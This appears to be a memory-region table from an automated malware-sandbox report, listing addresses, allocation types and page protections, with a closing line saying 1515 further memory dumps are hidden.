217FD5DB000
heap
page read and write
7FD00000
direct allocation
page read and write
2A7F000
direct allocation
page execute and read and write
93D000
heap
page read and write
28A1000
direct allocation
page execute and read and write
8A0000
heap
page read and write
7EEE0000
direct allocation
page read and write
3DBC7000
heap
page read and write
935000
heap
page read and write
584000
heap
page read and write
1F43AEF0000
heap
page execute and read and write
27571000
heap
page read and write
10DE86A0000
heap
page read and write
7FF70CCB1000
unkown
page read and write
7FF6FEF91000
unkown
page execute read
45C000
unkown
page read and write
7FF70CC70000
unkown
page readonly
A50000
heap
page read and write
4C7000
unkown
page read and write
97D000
heap
page read and write
7FF70CCB1000
unkown
page read and write
7FF70CCC9000
unkown
page readonly
970000
heap
page read and write
930000
heap
page read and write
950000
heap
page read and write
92B000
heap
page read and write
26D3000
heap
page read and write
992000
heap
page read and write
CD5A87D000
stack
page read and write
2745000
heap
page read and write
630000
trusted library allocation
page read and write
2C23B600000
heap
page read and write
5CE000
stack
page read and write
2990D910000
heap
page read and write
9A7000
heap
page read and write
7EDCF000
direct allocation
page read and write
27571000
heap
page read and write
1F453035000
heap
page read and write
996000
heap
page read and write
26D0000
heap
page read and write
3FC51000
heap
page read and write
1FEF10D6000
heap
page read and write
14155050000
heap
page read and write
787000
heap
page read and write
7FF70CCB1000
unkown
page read and write
7FF70CCCC000
unkown
page write copy
1FEF13A5000
heap
page read and write
4E4000
remote allocation
page execute and read and write
584000
heap
page read and write
7FF70CCAD000
unkown
page read and write
1F43B0EE000
trusted library allocation
page read and write
7FF70CC71000
unkown
page execute read
7FF70CCAD000
unkown
page read and write
2990D85B000
heap
page read and write
7FF70CC71000
unkown
page execute read
7FF70CC70000
unkown
page readonly
10DE83EB000
heap
page read and write
3FC5F000
heap
page read and write
9B000
stack
page read and write
26E60000
remote allocation
page read and write
27571000
heap
page read and write
2776E000
stack
page read and write
21C514C0000
heap
page read and write
3FA89000
heap
page read and write
7FF70CCAD000
unkown
page read and write
2748000
heap
page read and write
7FF6FEF9E000
unkown
page read and write
62E000
stack
page read and write
3FCE1000
heap
page read and write
74B8FB000
stack
page read and write
217FD590000
heap
page read and write
921000
heap
page read and write
935000
heap
page read and write
1FEF10DA000
heap
page read and write
24E03DE0000
heap
page read and write
7FF70CCCD000
unkown
page readonly
7FFD9BC60000
trusted library allocation
page read and write
23BBA8C0000
heap
page read and write
2751E000
heap
page read and write
9B000
stack
page read and write
1F43B2BA000
trusted library allocation
page read and write
1F43AA00000
heap
page read and write
There are 1515 hidden memdumps, click here to show them.